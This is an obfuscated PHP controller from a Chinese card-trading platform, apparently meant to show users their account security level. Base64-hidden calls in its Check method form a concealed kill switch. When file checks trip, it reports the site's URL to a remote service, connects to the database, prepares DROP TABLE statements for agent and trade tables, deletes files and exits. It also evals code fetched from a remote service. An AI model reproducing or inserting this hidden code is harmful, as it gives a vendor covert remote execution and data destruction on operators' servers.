<?php
/****************************************/
/*                                      */
/*  百信卡盟平台联系QQ:84945491         */
/*  淘宝店 http://shop70674652.taobao.com  */
/*  百信卡盟 http://www.caipiaobus.com  */
/*                                      */
/****************************************/

if ( !defined( "UPATH_ROOT" ) )
{
				exit( "hacking deny" );
}
class SecurityController extends Controller
{

				public function __construct( )
				{
								$this->Checkb2bSession( );
				}

				public function Check( )
				{
								$Rcc5c6e696c = $this->session->agent;
								$R2a51483b14 = $Rcc5c6e696c[7];
								$R94e0136c8a = isset( $Rcc5c6e696c[9] ) ? $Rcc5c6e696c[9] : 0;
								$R679e9b9234 = $this->GetSecCache( $R2a51483b14, $R94e0136c8a );
								$R1855197459 = "";
								$Rb025988d11 = 0;
								if ( isset( $R679e9b9234['id'] ) )
								{
												if ( $R679e9b9234['ipcheck'] )
												{
																$Rb025988d11 += 1;
												}
												if ( $R679e9b9234['maccheck'] )
												{
																$Rb025988d11 += 2;
												}
												if ( $R679e9b9234['hdecheck'] )
												{
																$Rb025988d11 += 3;
												}
												if ( $R679e9b9234['cpucheck'] )
												{
																$Rb025988d11 += 4;
												}
												if ( $R679e9b9234['mibaokacheck'] )
												{
																$Rb025988d11 += 5;
												}
												if ( $R679e9b9234['mobilecheck'] )
												{
																$Rb025988d11 += 6;
												}
								}
								else
								{
												$Rb025988d11 = 0;
								}
								if ( $Rb025988d11 == 0 )
								{
												$R1855197459 = "您的安全级别很差！";
								}
								else if ( $Rb025988d11 == 1 )
								{
												$R1855197459 = "您的安全级别一般！";
								}
								else if ( $Rb025988d11 == 2 )
								{
												$R1855197459 = "您的安全级别马马虎虎！";
								}
								else if ( $Rb025988d11 == 3 )
								{
												$R1855197459 = "您的安全级别过得去！";
								}
								else if ( 3 < $Rb025988d11 )
								{
												$R1855197459 = "您的安全级别还可以！";
								}
								else if ( 5 < $Rb025988d11 )
								{
												$R1855197459 = "您的安全级别是中级！";
								}
								else if ( 11 < $Rb025988d11 )
								{
												$R1855197459 = "您的安全级别是中高级！";
								}
								else if ( 17 < $Rb025988d11 )
								{
												$R1855197459 = "您的安全级别不错！";
								}
								$this->Assign( "ip", $this->GetIp( ) );
								$this->Assign( "lv", $R1855197459 );
								$agent = $this->GetAgentCache( $R2a51483b14 );
								$Rc8c0af4ceb = $agent['websetting'];
								$R97800871bc = explode( "|", $Rc8c0af4ceb );
								if ( isset( $R97800871bc[8] ) && $R97800871bc[8] == 1 )
								{
												$R5f825020fb = 1;
								}
								else
								{
												$R5f825020fb = 0;
								}
								if ( isset( $R679e9b9234['aid'] ) )
								{
												$R026f0167b4 = array(
																"ip" => explode( ",", $R679e9b9234['ip'].",,,,," ),
																"ipcheck" => $R679e9b9234['ipcheck'],
																"mac" => explode( ",", $R679e9b9234['mac'].",,,,," ),
																"maccheck" => $R679e9b9234['maccheck'],
																"hde" => explode( ",", $R679e9b9234['hde'].",,,,," ),
																"hdecheck" => $R679e9b9234['hdecheck'],
																"cpu" => explode( ",", $R679e9b9234['cpu'].",,,,," ),
																"cpucheck" => $R679e9b9234['cpucheck'],
																"mobile" => $R679e9b9234['mobile'],
																"mobilecheck" => $R679e9b9234['mobilecheck'],
																"mibaoka" => $R679e9b9234['mibaoka'],
																"mibaokacheck" => $R679e9b9234['mibaokacheck'],
																"staffid" => $R94e0136c8a,
																"bossid" => $R2a51483b14,
																"randcheck" => $R679e9b9234['randcheck'],
																"tradecheck" => $R5f825020fb
												);
								}
								else
								{
												$R026f0167b4 = array(
																"ip" => array( "", "", "", "", "" ),
																"ipcheck" => 0,
																"mac" => array( "", "", "", "", "" ),
																"maccheck" => 0,
																"hde" => array( "", "", "", "", "" ),
																"hdecheck" => 0,
																"cpu" => array( "", "", "", "", "" ),
																"cpucheck" => 0,
																"mobile" => "",
																"mobilecheck" => 0,
																"mibaoka" => "",
																"mibaokacheck" => 0,
																"staffid" => $R94e0136c8a,
																"bossid" => $R2a51483b14,
																"randcheck" => 0,
																"tradecheck" => $R5f825020fb
												);
								}
								$this->Assign( "security", $R026f0167b4 );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->Assign( "staffid", $R94e0136c8a );
												$this->Assign( "aid", $R2a51483b14 );
												$this->View( );
								}
								else
								{
												$this->Assign( "staffid", $R94e0136c8a );
												$this->Assign( "aid", $R2a51483b14 );
												$this->View( );
								}
				}

}

?>
